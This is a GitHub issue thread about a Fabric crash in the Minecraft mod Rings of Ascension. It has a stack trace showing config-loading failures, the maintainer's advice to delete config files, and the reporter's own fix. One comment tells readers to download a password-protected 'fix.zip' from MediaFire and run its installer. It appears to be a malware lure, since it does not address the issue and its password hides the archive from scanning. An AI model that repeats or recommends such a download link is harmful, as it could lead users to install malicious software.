### ISSUE TITLE
Rings of acension refusing to work entirely (1.19.2) (Fabric 0.77.0)

### ISSUE THREAD

**Issue by KIW-1** [Focamacho/RingsOfAscension#102]
java.lang.RuntimeException: Could not execute entrypoint stage 'main' due to errors, provided by 'ringsofascension' at 'com.focamacho.ringsofascension.RingsOfAscension'!
	at net.fabricmc.loader.impl.FabricLoaderImpl.lambda$invokeEntrypoints$2(FabricLoaderImpl.java:403)
	at net.fabricmc.loader.impl.util.ExceptionUtil.gatherExceptions(ExceptionUtil.java:33)
	at net.fabricmc.loader.impl.FabricLoaderImpl.invokeEntrypoints(FabricLoaderImpl.java:401)
	at net.fabricmc.loader.impl.game.minecraft.Hooks.startClient(Hooks.java:52)
	at net.minecraft.class_310.<init>(class_310.java:459)
	at net.minecraft.client.main.Main.method_44604(Main.java:205)
	at net.minecraft.client.main.Main.main(Main.java:51)
	at net.fabricmc.loader.impl.game.minecraft.MinecraftGameProvider.launch(MinecraftGameProvider.java:480)
	at net.fabricmc.loader.impl.launch.knot.Knot.launch(Knot.java:74)
	at net.fabricmc.loader.impl.launch.knot.KnotClient.main(KnotClient.java:23)
	Suppressed: com.google.gson.JsonSyntaxException: java.lang.IllegalStateException: Expected BEGIN_OBJECT but was STRING at line 1 column 1 path $
		at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$Adapter.read(ReflectiveTypeAdapterFactory.java:226)
		at com.google.gson.Gson.fromJson(Gson.java:963)
		at com.google.gson.Gson.fromJson(Gson.java:901)
		at org.samo_lego.simplevillagers.util.Config.loadConfigFile(Config.java:105)
		at org.samo_lego.simplevillagers.SimpleVillagers.onInitialize(SimpleVillagers.java:76)
		at net.fabricmc.loader.impl.FabricLoaderImpl.invokeEntrypoints(FabricLoaderImpl.java:399)
		... 7 more
	Caused by: java.lang.IllegalStateException: Expected BEGIN_OBJECT but was STRING at line 1 column 1 path $
		at com.google.gson.stream.JsonReader.beginObject(JsonReader.java:384)
		at com.google.gson.internal.bind.ReflectiveTypeAdapterFactory$Adapter.read(ReflectiveTypeAdapterFactory.java:215)
		... 12 more
Caused by: java.lang.ExceptionInInitializerError
	at com.focamacho.ringsofascension.RingsOfAscension.onInitialize(RingsOfAscension.java:25)
	at net.fabricmc.loader.impl.FabricLoaderImpl.invokeEntrypoints(FabricLoaderImpl.java:399)
	... 7 more
Caused by: java.lang.NullPointerException: Cannot read field "tiers" because "com.focamacho.ringsofascension.RingsOfAscension.config" is null
	at com.focamacho.ringsofascension.init.ModItems.<clinit>(ModItems.java:18)
	... 9 more

if any more information needs to be provided, let me know, but in the past hour, this mod has suddenly entirely stopped working for 1.19.2 despite only having 24 mods enabled, and it was working for weeks beforehand with the same mods and same modpack, it suddenly stopped working entirely.

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by focamacho** [comment]
Seems to be an issue loading the config file. Try deleting the Rings of Ascension config file and starting minecraft again.
You can also try the same with SimpleVillagers as it is also mentioned in the logs.

**Comment by KIW-1** [comment]
Thanks for the help, I actually managed to fix it on my own, by removing any deadweight mods not doing anything and also porting my save over to a brand new mod profile seemed to have corrected the issue, thanks for your input though! Much appreciated and a very quick response too, I must say big respect to you for being so ontop of things.
